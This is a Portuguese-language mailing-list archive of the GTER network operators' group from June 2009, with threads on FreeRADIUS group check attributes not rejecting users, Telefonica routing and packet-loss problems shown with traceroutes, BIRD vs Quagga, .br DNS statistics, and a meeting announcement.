Estou tentando for?ar um erro, mas ele continua autenticando o usu?rio normalmente. Descri??o do cen?rio: Usu?rio= 'test-user' Senha= 'test-pass' Esse usu?rio pertence a um grupo 'test-group'. No grupo 'test-group', existem alguns atributos de checagem (radgroupcheck): 'test-group' => 'NAS-Port-Type' == 'Async' A requisi??o est? vindo assim: rad_recv: Access-Request packet from host 192.168.x.x port 42112, id=59, length=125 Service-Type = Framed-User Framed-Protocol = PPP NAS-Port = 31 NAS-Port-Type = Ethernet <====== User-Name = "test-user" Calling-Station-Id = "00:00:00:00:00:00" Called-Station-Id = "service1" NAS-Port-Id = "wlan1" User-Password = "test-pass" NAS-Identifier = "MikroTik" NAS-IP-Address = 192.168.x.x Logo depois, o radius envia para o cliente: Sending Access-Accept of id 59 to 192.168.x.x port 42112 Alguma dica do porque disso n?o estar funcionando ? Abra?os! Obrigado. From henrique.holschuh at ima.sp.gov.br Tue Jun 2 13:07:28 2009 From: henrique.holschuh at ima.sp.gov.br (Henrique de Moraes Holschuh) Date: Tue, 02 Jun 2009 13:07:28 -0300 Subject: [GTER] BIRD vs Quagga? Message-ID: <4A254E40.4050503@ima.sp.gov.br> Algu?m tem alguma experi?ncia com o BIRD (http://bird.network.cz) ? Parece que o projeto est? correndo com sangue novo, diversas releases ap?s um hiato de diversos anos, agora com um reposit?rio git p?blico... -- Henrique de Moraes Holschuh IM@ - Inform?tica de Munic?pios Associados Projetos Especiais TEL +55-19-3739-6055/CEL +55-19-9293-9464 Antes de imprimir, lembre-se de seu compromisso com o Meio Ambiente e do custo que voc? pode evitar. From mike at braslink.com Tue Jun 2 14:53:36 2009 From: mike at braslink.com (Mike Tesliuk) Date: Tue, 2 Jun 2009 14:53:36 -0300 Subject: [GTER] Ainda problemas com a telefonica Message-ID: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> Ol? Amigos, Eu queria saber se algu?m est? tendo problemas com a telefonica ainda (estamos a uma semana ja) ? Temos nossa rede em miami ( 204.16.0.0/22 ) e usu?rios / provedores que utilizam a estrutura da telefonica n?o est?o chegando at? nossos servidores (com qualidade), n?s mesmos temos uma lp da telefonica e tive que trocar para uma conex?o da net para podermos trabalhar enquanto este problema n?o se resolve, basicamente eu tenho ping ok atrav?s da telefonica, a rota pelo que me parece eu passo por dentro da estrutura de adsl da telefonica, abaixo coloco um exemplo da minha rota. traceroute to 204.16.0.1 (204.16.0.1), 30 hops max, 40 byte packets 1 gw-spo-lins-tel (189.109.27.1) 0.881 ms 0.834 ms 0.766 ms 2 189-109-5-185.customer.tdatabrasil.net.br (189.109.5.185) 2.096 ms 2.021 ms 2.016 ms 3 * * * 4 201-0-3-65.dsl.telesp.net.br (201.0.3.65) 2.462 ms 2.663 ms 2.532 ms 5 201-63-253-142.customer.tdatabrasil.net.br (201.63.253.142) 2.810 ms 2.729 ms 201-63-253-146.customer.tdatabrasil.net.br (201.63.253.146) 2.754 ms 6 Xe3-1-0-0-grtsanem2.red.telefonica-wholesale.net.10.16.84.in-add (84.16.10.17) 4.943 ms 4.008 ms Xe7-2-0-0-grtsanem2.red.telefonica-wholesale.net (84.16.10.233) 4.138 ms 7 Xe8-1-0-0-grtmiabr6.red.telefonica-wholesale.net (84.16.15.22) 117.589 ms 117.636 ms 117.604 ms 8 Xe11-0-0-0-grtwaseq4.red.telefonica-wholesale.net (213.140.36.229) 162.865 ms Xe0-0-0-0-grtwaseq4.red.telefonica-wholesale.net (213.140.36.153) 152.998 ms Xe11-0-0-0-grtwaseq4.red.telefonica-wholesale.net (213.140.36.229) 162.824 ms 9 Pccwbtn-0-3-0-0-grtwaseq4.red.telefonica-wholesale.net (213.140.53.22) 315.858 ms 199.672 ms 252.659 ms 10 braslink.fe3-4.br01.mia02.pccwbtn.net (63.218.113.62) 183.716 ms * * Meus clientes est?o tendo dificuldades para utilizar servi?os de email e ftp, sites, eles tentam acessar fica carregando, quando tentam novamente eles conseguem ( ou n?o ) Agrade?o informa??es. From welliton at infonet.com.br Tue Jun 2 12:13:43 2009 From: welliton at infonet.com.br (=?ISO-8859-1?Q?Welliton_S=E1?=) Date: Tue, 2 Jun 2009 12:13:43 -0300 Subject: [GTER] =?iso-8859-1?q?Freeradius=3A_atributos_de_checagem_do_grup?= =?iso-8859-1?q?o_n=E3o_funcionam?= In-Reply-To: References: <2F825D207D3246EBA6A9E984341CDE79@admgaz.com.br> Message-ID: > 'test-group' => 'NAS-Port-Type' ?== 'Async' Tente usar o operador := no lugar de == From Augusto.Nellessen at abril.com.br Tue Jun 2 15:05:27 2009 From: Augusto.Nellessen at abril.com.br (Augusto Nellessen) Date: Tue, 2 Jun 2009 15:05:27 -0300 Subject: [GTER] RES: Ainda problemas com a telefonica In-Reply-To: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> Message-ID: Caros, Estamos com problemas para alguns sites internacionais, a lat?ncia aumentou bastante. A operadora j? est? trabalhando no assunto. Para sites no Brasil o acesso est? OK. Tivemos alguns problemas na semana passada na interconex?o entre a BrT e a TLF. Augusto Nellessen -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de Mike Tesliuk Enviada em: ter?a-feira, 2 de junho de 2009 14:54 Para: Grupo de Trabalho de Engenharia e Operacao de Redes Assunto: [GTER] Ainda problemas com a telefonica Ol? Amigos, Eu queria saber se algu?m est? tendo problemas com a telefonica ainda (estamos a uma semana ja) ? Temos nossa rede em miami ( 204.16.0.0/22 ) e usu?rios / provedores que utilizam a estrutura da telefonica n?o est?o chegando at? nossos servidores (com qualidade), n?s mesmos temos uma lp da telefonica e tive que trocar para uma conex?o da net para podermos trabalhar enquanto este problema n?o se resolve, basicamente eu tenho ping ok atrav?s da telefonica, a rota pelo que me parece eu passo por dentro da estrutura de adsl da telefonica, abaixo coloco um exemplo da minha rota. traceroute to 204.16.0.1 (204.16.0.1), 30 hops max, 40 byte packets 1 gw-spo-lins-tel (189.109.27.1) 0.881 ms 0.834 ms 0.766 ms 2 189-109-5-185.customer.tdatabrasil.net.br (189.109.5.185) 2.096 ms 2.021 ms 2.016 ms 3 * * * 4 201-0-3-65.dsl.telesp.net.br (201.0.3.65) 2.462 ms 2.663 ms 2.532 ms 5 201-63-253-142.customer.tdatabrasil.net.br (201.63.253.142) 2.810 ms 2.729 ms 201-63-253-146.customer.tdatabrasil.net.br (201.63.253.146) 2.754 ms 6 Xe3-1-0-0-grtsanem2.red.telefonica-wholesale.net.10.16.84.in-add (84.16.10.17) 4.943 ms 4.008 ms Xe7-2-0-0-grtsanem2.red.telefonica-wholesale.net (84.16.10.233) 4.138 ms 7 Xe8-1-0-0-grtmiabr6.red.telefonica-wholesale.net (84.16.15.22) 117.589 ms 117.636 ms 117.604 ms 8 Xe11-0-0-0-grtwaseq4.red.telefonica-wholesale.net (213.140.36.229) 162.865 ms Xe0-0-0-0-grtwaseq4.red.telefonica-wholesale.net (213.140.36.153) 152.998 ms Xe11-0-0-0-grtwaseq4.red.telefonica-wholesale.net (213.140.36.229) 162.824 ms 9 Pccwbtn-0-3-0-0-grtwaseq4.red.telefonica-wholesale.net (213.140.53.22) 315.858 ms 199.672 ms 252.659 ms 10 braslink.fe3-4.br01.mia02.pccwbtn.net (63.218.113.62) 183.716 ms * * Meus clientes est?o tendo dificuldades para utilizar servi?os de email e ftp, sites, eles tentam acessar fica carregando, quando tentam novamente eles conseguem ( ou n?o ) Agrade?o informa??es. -- gter list https://eng.registro.br/mailman/listinfo/gter ___________________________________________________ AVISO LEGAL: Esta mensagem e arquivo(s) podem conter informa??es confidenciais e/ou legalmente protegidas. Caso tenha recebido por engano, favor devolv?-la ao remetente e elimin?-la do seu sistema, n?o divulgando ou utilizando a totalidade ou parte desta mensagem ou dos documentos a ela anexados. LEGAL NOTICE: This message and attached document(s) may contain information of confidential nature and/or legally protected. If you have received this message by mistake, please reply to the sender, eliminate it from your system and do not disclose or use this message or the attached documents, in whole or in part. _____________________________________________________ From ihtraum18 at gmail.com Tue Jun 2 01:11:01 2009 From: ihtraum18 at gmail.com (=?ISO-8859-1?Q?Eduardo_J=FAnior?=) Date: Tue, 2 Jun 2009 01:11:01 -0300 Subject: [GTER] =?iso-8859-1?q?Estat=EDsticas_de_requisi=E7=F5es_DNS?= Message-ID: Ol?, amigos sabem me informar onde posso encontrar estat?sticas de acesso (requisi??es) ao dom?nio .br.? Isso se existe tal informa??o dispon?vel. Acredito que sim, pois para o dom?nio .jp eu consegui encontrar dados a respeito Gostaria de basear um trabalho que estou desenvolvendo com essas m?dias e n?o consegui achar nada a respeito em buscar pelo site registro.br []'s -- Eduardo J?nior GNU/Linux user #423272 :wq From renato.diogo at gmail.com Tue Jun 2 15:37:20 2009 From: renato.diogo at gmail.com (Renato de Oliveira Diogo) Date: Tue, 2 Jun 2009 15:37:20 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A_Problema_Navega=E7=E3o_=28_Telefonic?= =?iso-8859-1?q?a_=29?= In-Reply-To: <7a152a290906010921l6c84c541u44baa2ab9110de4a@mail.gmail.com> References: <276fbe8b0905291639t76a1cf49x3773cf19e619b87@mail.gmail.com> <200905310250.20403.herbert@scw.net.br> <7a152a290906010921l6c84c541u44baa2ab9110de4a@mail.gmail.com> Message-ID: <724d72960906021137v233d1330ieb4bf01788384569@mail.gmail.com> Senhores algu?m seguiu o conselho que o Gustavo passou a?? Aqui depois que ele aplicou as regras aparentemente minimizou muito o problema. Ainda estou tentando falar com a telefonica para falar sobre o assunto, mas ainda n?o consegui. Pois se ? em alguns equipamentos deles s?o eles que devem corrigir esses filtros. Comigo eu percebi o seguinte, come?ou a ocorrer o problema na ultima semana de mar?o (todo esse tempo mesmo), creio que logo depois que a pr?pria telefonica teve um problema com um backbone em Miami. E logo depois disso temos tamb?m outros problemas de ataque aos computadores da telefonica. Como em todo ataque, se coloca filtro pra tentar resolver o problema e a chance de ter colocar algum filtro e n?o ter removido ? alto. O que voc?s dissem... Atenciosamente ________________________________________________ Renato de Oliveira Diogo Bacharel em Ci?ncia da Computa??o UNESP - Bauru LPIC1 - Linux Professional Institute Certification - N?vel 1 renato.diogo at gmail.com renato.diogo at yahoo.com.br 2009/6/1 Mike Tesliuk : > N?s aqui ainda estamos com problemas com o link da telefonica , tive > que trocar o acesso dos usu?rios para um Virtua porque esta terrivel. > > Telefonica disse que n?o h? anormalidades, mas que eu tenho que > aguardar o pessoal de roteadores me responder. > > 2009/5/31 Herbert Faleiros : >> On Sat 30 May 2009 09:44:37 Farrapo - LDR wrote: >>> Deve especificar que o MSS seja modificado somente nos pacotes maiores que >>> o desejado. Ex.: Incluir na tua linha: tcp-mss=1401-65535 >> >> >> Ou ent?o usa o seguinte: new-mss=clamp-to-pmtu >> (mesma t?cnica que descrevi no outro e-mail como exemplo p/ o Linux) >> >> -- >> Herbert >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From eschoedler at viavale.com.br Tue Jun 2 15:41:03 2009 From: eschoedler at viavale.com.br (Eduardo Schoedler) Date: Tue, 2 Jun 2009 15:41:03 -0300 Subject: [GTER] =?iso-8859-1?q?Freeradius=3A_atributos_de_checagem_do_grup?= =?iso-8859-1?q?o_n=E3o_funcionam?= References: <2F825D207D3246EBA6A9E984341CDE79@admgaz.com.br> Message-ID: <2BB87D070AB64003A5343AFCEDD26356@admgaz.com.br> Em 2009-06-02 12:13, Welliton S? escreveu: > Tente usar o operador := no lugar de == Ol? Welliton! Fiz isso tamb?m, n?o adiantou. Eu estive relendo os manuais do freeradius [1], e acho que havia entendido errado o funcionamento dele. Por favor me corrijam se eu estiver errado. 1 - Ele primeiro processa os atributos de verifica??o usu?rio (radcheck); 2 - Se coincidir, ele traz os atributos de retorno do usu?rio (radreply); ...somente ent?o ele processa os grupos... (read_groups = yes) 3 - Consulta os atributos de verifica??o do grupo (radgroupcheck); 4 - Se coincidir, ele retorna os atributos de retorno do grupo (radreply); Com base nisso, resolvi inverter o meu teste. Entendi que quando ele encontrasse o atributo "Framed-Protocol = PPP", ele iria ler os atributos de retorno do grupo. Ent?o na verifica??o do grupo eu coloquei : 'test-group' => Framed-Protocol == PPP (testei tamb?m com ':=' ) E em radgroupreply coloquei: 'test-group' => Auth-Type = Reject (para for?ar o erro) Mesmo assim ele continua autenticando o usu?rio !!! Usando o radtest, ele suporta um ?ltimo par?metro que inclui na requisi??o o atributo "Framed-Protocol = PPP". # radtest test-user test-pass localhost 0 testing123 Sending Access-Request of id 2 to 127.0.0.1 port 1812 User-Name = "test-user" User-Password = "test-pass" NAS-IP-Address = 127.0.0.1 NAS-Port = 0 rad_recv: Access-Accept packet from host 127.0.0.1 port 1812, id=2, length=20 # radtest test-user test-pass localhost 0 testing123 1 Sending Access-Request of id 163 to 127.0.0.1 port 1812 User-Name = "test-user" User-Password = "test-pass" NAS-IP-Address = 127.0.0.1 NAS-Port = 0 Framed-Protocol = PPP <===== rad_recv: Access-Accept packet from host 127.0.0.1 port 1812, id=163, length=20 Tem alguma coisa estranha na minha configura??o... Obrigado pela for?a! Eduardo. [1] http://wiki.freeradius.org/Rlm_sql#SQL_Schema_and_usage From caref at proxy.com.br Tue Jun 2 15:17:51 2009 From: caref at proxy.com.br (Edison F. Carbol) Date: Tue, 2 Jun 2009 15:17:51 -0300 Subject: [GTER] Ainda problemas com a telefonica References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> Message-ID: <95E22E7A334E42FA822F3E41BF518E42@carbol> Aqui o mesmo problema atrav?s de conex?o Speedy. Traceroute e ping chegam normalmente. Tenho servidores na The Planet. No mesmo servidor tem sites que abrem outros n?o. Edison F. Carbol Diretor T?cnico Proxy Network Comercial Ltda. proxy at proxy.com.br http://www.proxy.com.br Tel/Fax 11 4586-2882 ----- Original Message ----- From: "Mike Tesliuk" To: "Grupo de Trabalho de Engenharia e Operacao de Redes" Sent: Tuesday, June 02, 2009 2:53 PM Subject: [GTER] Ainda problemas com a telefonica Ol? Amigos, Eu queria saber se algu?m est? tendo problemas com a telefonica ainda (estamos a uma semana ja) ? Temos nossa rede em miami ( 204.16.0.0/22 ) e usu?rios / provedores que utilizam a estrutura da telefonica n?o est?o chegando at? nossos servidores (com qualidade), n?s mesmos temos uma lp da telefonica e tive que trocar para uma conex?o da net para podermos trabalhar enquanto este problema n?o se resolve, basicamente eu tenho ping ok atrav?s da telefonica, a rota pelo que me parece eu passo por dentro da estrutura de adsl da telefonica, abaixo coloco um exemplo da minha rota. traceroute to 204.16.0.1 (204.16.0.1), 30 hops max, 40 byte packets 1 gw-spo-lins-tel (189.109.27.1) 0.881 ms 0.834 ms 0.766 ms 2 189-109-5-185.customer.tdatabrasil.net.br (189.109.5.185) 2.096 ms 2.021 ms 2.016 ms 3 * * * 4 201-0-3-65.dsl.telesp.net.br (201.0.3.65) 2.462 ms 2.663 ms 2.532 ms 5 201-63-253-142.customer.tdatabrasil.net.br (201.63.253.142) 2.810 ms 2.729 ms 201-63-253-146.customer.tdatabrasil.net.br (201.63.253.146) 2.754 ms 6 Xe3-1-0-0-grtsanem2.red.telefonica-wholesale.net.10.16.84.in-add (84.16.10.17) 4.943 ms 4.008 ms Xe7-2-0-0-grtsanem2.red.telefonica-wholesale.net (84.16.10.233) 4.138 ms 7 Xe8-1-0-0-grtmiabr6.red.telefonica-wholesale.net (84.16.15.22) 117.589 ms 117.636 ms 117.604 ms 8 Xe11-0-0-0-grtwaseq4.red.telefonica-wholesale.net (213.140.36.229) 162.865 ms Xe0-0-0-0-grtwaseq4.red.telefonica-wholesale.net (213.140.36.153) 152.998 ms Xe11-0-0-0-grtwaseq4.red.telefonica-wholesale.net (213.140.36.229) 162.824 ms 9 Pccwbtn-0-3-0-0-grtwaseq4.red.telefonica-wholesale.net (213.140.53.22) 315.858 ms 199.672 ms 252.659 ms 10 braslink.fe3-4.br01.mia02.pccwbtn.net (63.218.113.62) 183.716 ms * * Meus clientes est?o tendo dificuldades para utilizar servi?os de email e ftp, sites, eles tentam acessar fica carregando, quando tentam novamente eles conseguem ( ou n?o ) Agrade?o informa??es. -- gter list https://eng.registro.br/mailman/listinfo/gter From gter at registro.br Tue Jun 2 15:54:22 2009 From: gter at registro.br (Secretaria GTER27) Date: Tue, 2 Jun 2009 15:54:22 -0300 Subject: [GTER] Agenda e Inscricoes - GTER27 e GTS13 Message-ID: <20090602185422.GL88510@registro.br> J? est? dispon?vel a agenda do GTER27 e GTS13 http://gter.nic.br/reunioes/gter-27/programa As inscri??es tamb?m j? encontram-se abertas em: https://eng.registro.br/cgi-bin/gter/gter.cgi Atenciosamente, Secretaria GTER -- Secretaria GTER 27? Reuni?o S?o Paulo - 19 e 20 de junho de 2009 http://gter.nic.br/ From vbenincasa.listas at gmail.com Tue Jun 2 16:08:21 2009 From: vbenincasa.listas at gmail.com (Victor Benincasa) Date: Tue, 2 Jun 2009 16:08:21 -0300 Subject: [GTER] Ainda problemas com a telefonica References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> Message-ID: Mike e colegas de lista, Tamb?m estamos com o mesmo problema. Temos servidores na ThePlanet (Texas-EUA), e h? cerca de 5 dias alguns clientes nossos que utilizam links da Telef?nica (em especial o Speedy) est?o relatando problemas no recebimento de e-mails (timeout). Ping (pacotes ICMP) trafegam sem problema, j? pacotes TCP tem tido uma taxa de perda m?dia de 50%! Algu?m tem alguma luz ou contato com pessoal t?cnico da Telefonica? -- Victor Benincasa http://netbit.com.br ----- Original Message ----- From: "Mike Tesliuk" To: "Grupo de Trabalho de Engenharia e Operacao de Redes" Sent: Tuesday, June 02, 2009 2:53 PM Subject: [GTER] Ainda problemas com a telefonica Ol? Amigos, Eu queria saber se algu?m est? tendo problemas com a telefonica ainda (estamos a uma semana ja) ? Temos nossa rede em miami ( 204.16.0.0/22 ) e usu?rios / provedores que utilizam a estrutura da telefonica n?o est?o chegando at? nossos servidores (com qualidade), n?s mesmos temos uma lp da telefonica e tive que trocar para uma conex?o da net para podermos trabalhar enquanto este problema n?o se resolve, basicamente eu tenho ping ok atrav?s da telefonica, a rota pelo que me parece eu passo por dentro da estrutura de adsl da telefonica, abaixo coloco um exemplo da minha rota. traceroute to 204.16.0.1 (204.16.0.1), 30 hops max, 40 byte packets 1 gw-spo-lins-tel (189.109.27.1) 0.881 ms 0.834 ms 0.766 ms 2 189-109-5-185.customer.tdatabrasil.net.br (189.109.5.185) 2.096 ms 2.021 ms 2.016 ms 3 * * * 4 201-0-3-65.dsl.telesp.net.br (201.0.3.65) 2.462 ms 2.663 ms 2.532 ms 5 201-63-253-142.customer.tdatabrasil.net.br (201.63.253.142) 2.810 ms 2.729 ms 201-63-253-146.customer.tdatabrasil.net.br (201.63.253.146) 2.754 ms 6 Xe3-1-0-0-grtsanem2.red.telefonica-wholesale.net.10.16.84.in-add (84.16.10.17) 4.943 ms 4.008 ms Xe7-2-0-0-grtsanem2.red.telefonica-wholesale.net (84.16.10.233) 4.138 ms 7 Xe8-1-0-0-grtmiabr6.red.telefonica-wholesale.net (84.16.15.22) 117.589 ms 117.636 ms 117.604 ms 8 Xe11-0-0-0-grtwaseq4.red.telefonica-wholesale.net (213.140.36.229) 162.865 ms Xe0-0-0-0-grtwaseq4.red.telefonica-wholesale.net (213.140.36.153) 152.998 ms Xe11-0-0-0-grtwaseq4.red.telefonica-wholesale.net (213.140.36.229) 162.824 ms 9 Pccwbtn-0-3-0-0-grtwaseq4.red.telefonica-wholesale.net (213.140.53.22) 315.858 ms 199.672 ms 252.659 ms 10 braslink.fe3-4.br01.mia02.pccwbtn.net (63.218.113.62) 183.716 ms * * Meus clientes est?o tendo dificuldades para utilizar servi?os de email e ftp, sites, eles tentam acessar fica carregando, quando tentam novamente eles conseguem ( ou n?o ) Agrade?o informa??es. -- gter list https://eng.registro.br/mailman/listinfo/gter From andre at insite.com.br Tue Jun 2 19:31:35 2009 From: andre at insite.com.br (Andre Uratsuka Manoel) Date: Tue, 2 Jun 2009 19:31:35 -0300 Subject: [GTER] Ainda problemas com a telefonica In-Reply-To: References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> Message-ID: Temos problemas com conex?es SSL que ?s vezes, para alguns endere?os, simplesmente travam. Algumas conex?es ssh para alguns endere?os fora do pa?s tem o mesmo problema. Acessos por outras redes funcionam normalmente. Acessos funcionam ?s vezes, e ?s vezes funcionam para alguns endere?os de origem mas n?o para outros. Andre 2009/6/2 Victor Benincasa : > Mike e colegas de lista, > > Tamb?m estamos com o mesmo problema. Temos servidores na ThePlanet > (Texas-EUA), e h? cerca de 5 dias alguns clientes nossos que utilizam links > da Telef?nica (em especial o Speedy) est?o relatando problemas no > recebimento de e-mails (timeout). > > Ping (pacotes ICMP) trafegam sem problema, j? pacotes TCP tem tido uma > taxa de perda m?dia de 50%! > > Algu?m tem alguma luz ou contato com pessoal t?cnico da Telefonica? > > -- > Victor Benincasa > http://netbit.com.br > > > ----- Original Message ----- From: "Mike Tesliuk" > To: "Grupo de Trabalho de Engenharia e Operacao de Redes" > > Sent: Tuesday, June 02, 2009 2:53 PM > Subject: [GTER] Ainda problemas com a telefonica > > > Ol? Amigos, > > Eu queria saber se algu?m est? tendo problemas com a telefonica ainda > (estamos a uma semana ja) ? > > Temos nossa rede em miami ( 204.16.0.0/22 ) e usu?rios / provedores > que utilizam a estrutura da telefonica n?o est?o chegando at? nossos > servidores (com qualidade), n?s mesmos temos uma lp da telefonica e > tive que trocar para uma conex?o da net para podermos trabalhar > enquanto este problema n?o se resolve, basicamente eu tenho ping ok > atrav?s da telefonica, a rota pelo que me parece eu passo por dentro > da estrutura de adsl da telefonica, abaixo coloco um exemplo da minha > rota. > > traceroute to 204.16.0.1 (204.16.0.1), 30 hops max, 40 byte packets > 1 ?gw-spo-lins-tel (189.109.27.1) ?0.881 ms ?0.834 ms ?0.766 ms > 2 ?189-109-5-185.customer.tdatabrasil.net.br (189.109.5.185) ?2.096 > ms ?2.021 ms ?2.016 ms > 3 ?* * * > 4 ?201-0-3-65.dsl.telesp.net.br (201.0.3.65) ?2.462 ms ?2.663 ms ?2.532 ms > 5 ?201-63-253-142.customer.tdatabrasil.net.br (201.63.253.142) ?2.810 > ms ?2.729 ms 201-63-253-146.customer.tdatabrasil.net.br > (201.63.253.146) ?2.754 ms > 6 ?Xe3-1-0-0-grtsanem2.red.telefonica-wholesale.net.10.16.84.in-add > (84.16.10.17) ?4.943 ms ?4.008 ms > Xe7-2-0-0-grtsanem2.red.telefonica-wholesale.net (84.16.10.233) ?4.138 > ms > 7 ?Xe8-1-0-0-grtmiabr6.red.telefonica-wholesale.net (84.16.15.22) > 117.589 ms ?117.636 ms ?117.604 ms > 8 ?Xe11-0-0-0-grtwaseq4.red.telefonica-wholesale.net (213.140.36.229) > 162.865 ms Xe0-0-0-0-grtwaseq4.red.telefonica-wholesale.net > (213.140.36.153) ?152.998 ms > Xe11-0-0-0-grtwaseq4.red.telefonica-wholesale.net (213.140.36.229) > 162.824 ms > 9 ?Pccwbtn-0-3-0-0-grtwaseq4.red.telefonica-wholesale.net > (213.140.53.22) ?315.858 ms ?199.672 ms ?252.659 ms > 10 ?braslink.fe3-4.br01.mia02.pccwbtn.net (63.218.113.62) ?183.716 ms * * > > > Meus clientes est?o tendo dificuldades para utilizar servi?os de email > e ftp, sites, eles tentam acessar fica carregando, quando tentam > novamente eles conseguem ( ou n?o ) > > Agrade?o informa??es. > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > > From eschoedler at viavale.com.br Wed Jun 3 00:05:55 2009 From: eschoedler at viavale.com.br (Eduardo Schoedler) Date: Wed, 3 Jun 2009 00:05:55 -0300 Subject: [GTER] =?iso-8859-1?q?Freeradius=3A_atributos_de_checagem_do_grup?= =?iso-8859-1?q?o_n=E3o_funcionam?= References: <2F825D207D3246EBA6A9E984341CDE79@admgaz.com.br> <2BB87D070AB64003A5343AFCEDD26356@admgaz.com.br> Message-ID: <3B49658924B14819BC4957F400F6A01D@admgaz.com.br> Pessoal. Andei fazendo mais alguns testes... Aparentemente, os atributos de verifica??o por grupos s? serve para dizer ao FR quando enviar ou n?o atributos de retorno do grupo ao NAS. N?o consegui fazer qualquer verifica??o de atributos utilizando a tabela radgroupcheck. Abaixo, segue um exemplo. 'test-user' pertence ao grupo 'test-group'. Na tabela de radgroupcheck, adicionei a seguinte "regra": 'test-group' => Framed-Protocol == PPP Na tabela de radgroupreply, adicionei um atributo de retorno: 'test-group' => Idle-Timeout <= 600 Ent?o come?ou a funcionar... mas n?o do jeito que eu imaginava ou precisava. Quando enviei 'Framed-Protocol' na requisi??o, ele respondia o atributo especificado no grupo. Na verdade, eu precisaria que ele rejeitasse (Access-Reject) se a requisi??o n?o tivesse 'Framed-Protocol' ou ent?o o valor desse atributo fosse diferente de PPP. # radtest test-user test-pass localhost 0 testing123 1 Sending Access-Request of id 110 to 127.0.0.1 port 1812 User-Name = "test-user" User-Password = "test-pass" NAS-IP-Address = 127.0.0.1 NAS-Port = 0 Framed-Protocol = PPP rad_recv: Access-Accept packet from host 127.0.0.1 port 1812, id=110, length=26 Idle-Timeout = 600 Quando mandava sem, ele respondia Access-Accept de qualquer jeito... mas n?o retornava 'Idle-Timeout'. # radtest test-user test-pass localhost 0 testing123 Sending Access-Request of id 12 to 127.0.0.1 port 1812 User-Name = "test-user" User-Password = "test-pass" NAS-IP-Address = 127.0.0.1 NAS-Port = 0 rad_recv: Access-Accept packet from host 127.0.0.1 port 1812, id=12, length=20 Ou seja: se eu quiser recusar qualquer login a partir dos atributos da requisi??o, terei de adicionar atributos em usu?rio por usu?rio.... nada pr?tico e muito suscet?vel a erros por parte do operador. Acredito que uma solu??o seria alterar a consulta SQL de authorize_check_query ... talvez um UNION trazendo junto os atributos do radgroupcheck. N?o ? a melhor solu??o, mas acho que funcionaria. Abra?os. From alexandre at onda.psi.br Wed Jun 3 00:12:10 2009 From: alexandre at onda.psi.br (Alexandre J. Correa - Onda Internet) Date: Wed, 03 Jun 2009 00:12:10 -0300 Subject: [GTER] =?iso-8859-1?q?Freeradius=3A_atributos_de_checagem_do_grup?= =?iso-8859-1?q?o_n=E3o_funcionam?= In-Reply-To: <3B49658924B14819BC4957F400F6A01D@admgaz.com.br> References: <2F825D207D3246EBA6A9E984341CDE79@admgaz.com.br> <2BB87D070AB64003A5343AFCEDD26356@admgaz.com.br> <3B49658924B14819BC4957F400F6A01D@admgaz.com.br> Message-ID: <4A25EA0A.6000101@onda.psi.br> um script externo tambem resolve o seu problema ... Eduardo Schoedler wrote: > Pessoal. > > Andei fazendo mais alguns testes... > > Aparentemente, os atributos de verifica??o por grupos s? serve para > dizer ao FR quando enviar ou n?o atributos de retorno do grupo ao NAS. > N?o consegui fazer qualquer verifica??o de atributos utilizando a > tabela radgroupcheck. > > Abaixo, segue um exemplo. > > 'test-user' pertence ao grupo 'test-group'. > > Na tabela de radgroupcheck, adicionei a seguinte "regra": > 'test-group' => Framed-Protocol == PPP > > Na tabela de radgroupreply, adicionei um atributo de retorno: > 'test-group' => Idle-Timeout <= 600 > > Ent?o come?ou a funcionar... mas n?o do jeito que eu imaginava ou > precisava. > Quando enviei 'Framed-Protocol' na requisi??o, ele respondia o > atributo especificado no grupo. > > Na verdade, eu precisaria que ele rejeitasse (Access-Reject) se a > requisi??o n?o tivesse 'Framed-Protocol' ou ent?o o valor desse > atributo fosse diferente de PPP. > > # radtest test-user test-pass localhost 0 testing123 1 > Sending Access-Request of id 110 to 127.0.0.1 port 1812 > User-Name = "test-user" > User-Password = "test-pass" > NAS-IP-Address = 127.0.0.1 > NAS-Port = 0 > Framed-Protocol = PPP > rad_recv: Access-Accept packet from host 127.0.0.1 port 1812, id=110, > length=26 > Idle-Timeout = 600 > > Quando mandava sem, ele respondia Access-Accept de qualquer jeito... > mas n?o retornava 'Idle-Timeout'. > > # radtest test-user test-pass localhost 0 testing123 > Sending Access-Request of id 12 to 127.0.0.1 port 1812 > User-Name = "test-user" > User-Password = "test-pass" > NAS-IP-Address = 127.0.0.1 > NAS-Port = 0 > rad_recv: Access-Accept packet from host 127.0.0.1 port 1812, id=12, > length=20 > > Ou seja: se eu quiser recusar qualquer login a partir dos atributos da > requisi??o, terei de adicionar atributos em usu?rio por usu?rio.... > nada pr?tico e muito suscet?vel a erros por parte do operador. > > Acredito que uma solu??o seria alterar a consulta SQL de > authorize_check_query ... talvez um UNION trazendo junto os atributos > do radgroupcheck. > N?o ? a melhor solu??o, mas acho que funcionaria. > > Abra?os. > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From eschoedler at viavale.com.br Wed Jun 3 00:27:30 2009 From: eschoedler at viavale.com.br (Eduardo Schoedler) Date: Wed, 3 Jun 2009 00:27:30 -0300 Subject: [GTER] =?iso-8859-1?q?Freeradius=3A_atributos_de_checagem_do_grup?= =?iso-8859-1?q?o_n=E3o_funcionam?= References: <2F825D207D3246EBA6A9E984341CDE79@admgaz.com.br> <2BB87D070AB64003A5343AFCEDD26356@admgaz.com.br><3B49658924B14819BC4957F400F6A01D@admgaz.com.br> <4A25EA0A.6000101@onda.psi.br> Message-ID: Eu estou controlando tudo por mysql... ao meu ver, n?o deveria ser necess?rio criar uma estrutura adicional, uma vez que j? existem tabelas que fazem/comportam exatamente o que eu precisaria informar ao FR. Bom, paci?ncia... Abra?o! ----- Original Message ----- From: "Alexandre J. Correa - Onda Internet" Sent: Wednesday, June 03, 2009 12:12 AM Subject: Re: [GTER] Freeradius: atributos de checagem do grupo n?o funcionam um script externo tambem resolve o seu problema ... Eduardo 